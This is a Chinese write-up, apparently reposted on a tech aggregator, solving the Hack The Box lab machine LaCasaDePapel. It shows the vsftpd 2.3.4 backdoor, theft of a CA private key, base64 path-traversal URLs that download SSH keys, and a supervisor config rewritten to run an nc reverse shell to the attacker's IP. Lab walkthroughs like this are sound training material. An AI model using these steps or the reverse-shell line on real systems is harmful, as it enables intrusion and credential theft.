IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> hack the box LaCasaDePapel靶机 -> 正文阅读

[网络协议]hack the box LaCasaDePapel靶机

打开靶机,扫描一下,能发现开了21,80,443等端口。

nmap -sV -Pn -A 10.10.10.131

在这里插入图片描述
80端口访问,是给了一个验证码,拿着验证码扫描出来的东西去解密也失败了,不对。

443端口访问,发现是自签名证书,然后说要证书才能进,咱们也没有啊,先放放。
在这里插入图片描述

ftp能发现是vsftpd 2.3.4版本,在msf搜索中发现存在后门,利用msf直接攻击发现无效,非常尴尬,通过以下方法可以搞定。
首先是登录ftp,然后用户名输入任意带有:)符号的名字即可,密码随便输

ftp 10.10.10.131 

在这里插入图片描述
同时开启另一个窗口,使用nc监听远程靶机的6200端口

nc 10.10.10.131 6200

出现如下显示,那么代表成功利用了后门
在这里插入图片描述
能看到里面有个tokyo文件,打开tokyo文件能发现是对证书的一个签名?同时知道证书的位置。我们获取一下证书

file_get_contents('/home/nairobi/ca.key')

在这里插入图片描述
这个地方能获取证书的私钥,同时443需要自己的证书,那么一拍即合,我们将私钥弄下来,一会去生成证书。将私钥的内容复制到文件中,然后删除全部的\n以及空格,记得空格要删除。保存为ca2.key。
在这里插入图片描述
然后来生成证书。一定要记得自己输入的密码,内容可以随便填,但是要记得密码。

openssl req -new -key ca2.key -out server.csr
openssl x509 -req -days 365 -in server.csr -signkey ca2.key -out server.crt
openssl pkcs12 -export -in server.crt -inkey ca2.key -out server.p12

在这里插入图片描述
生成了证书后,打开浏览器,在隐私与安全,证书,查看证书下面,您的证书下面,选择导入刚才的证书。
在这里插入图片描述
接着继续访问https://10.10.10.131,会出现一个弹窗,然后确定,就能进入以下页面
在这里插入图片描述
继续点进去,发现能看到电影资源,而且能下载
在这里插入图片描述

鼠标放到每集上面,看左下角,有一个链接。我们选择第八集下载看看。
在这里插入图片描述
我们去解密一下后面的这串字符什么意思。测试后发现是base64加密的第几集的文件的位置。
在这里插入图片描述
ok,既然是文件的位置,那我们是不是可以测试一下本地文件包含看看。
访问以下地址,读取一下linux的用户配置文件。

https://10.10.10.131/?path=/etc/passwd

没有显示什么东西,但是背景上有密密麻麻的一些字符,我们仔细看,发现当前的位置应该是home/berlin/downloads
在这里插入图片描述
那我们就需要跨越一下目录了,可以使用…/往上跨越一下目录,越级往上看,能知道有五个用户
在这里插入图片描述
点击第一个berlin,能看到user.txt。但是继续点击不行了。此时我们想到,下载的时候的链接是file后面加密,那么我们可以试试,对…/…/…/home/berlin/user.txt进行base64加密

Li4vLi4vLi4vaG9tZS9iZXJsaW4vdXNlci50eHQ=

形成以下链接

https://10.10.10.131/file/Li4vLi4vLi4vaG9tZS9iZXJsaW4vdXNlci50eHQ=

访问,拿下user.txt
在这里插入图片描述
继续翻找,发现每个用户下面都有.ssh文件夹
在这里插入图片描述
.ssh问价夹下面有id_rsa文件,这个文件可以免密ssh登录,那还等什么,还是利用file那个链接,下载下来,直接登录。
在这里插入图片描述
在这里插入图片描述
把所有用户的id_rsa文件下载下来后,同时professor的id_rsa文件是不可见的,全部尝试登录,得,全部失败。麻了。
在这里插入图片描述
通过查找后发现,在跟目录下面,也有.ssh/id_rsa。构造以下链接

https://10.10.10.131/file/Li4vLi4vLnNzaC9pZF9yc2E

在这里插入图片描述
下载下来id_rsa文件,然后尝试登录professor账户,成了,登录进去了。
在这里插入图片描述
当前目录下面存在文件,一般会出现文件属于某个用户,但是执行却是root用户的权限,我们通过ls -l查看下,果然,memcached.ini文件确实是root。
在这里插入图片描述
尝试修改,发现是readonly的,那么我们直接删掉,来个偷梁换柱。

rm memcached.ini
vi memcached.ini

写入以下内容

[program:memcached]
command = /usr/bin/nc 10.10.14.3 6666 -e /bin/bash

本地监听6666端口

nc -lnvvp 6666

等会拿到shell
在这里插入图片描述
在root下面拿到root.txt
在这里插入图片描述

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-04-29 12:30:01  更:2022-04-29 12:30:54 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/30 4:28:28-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码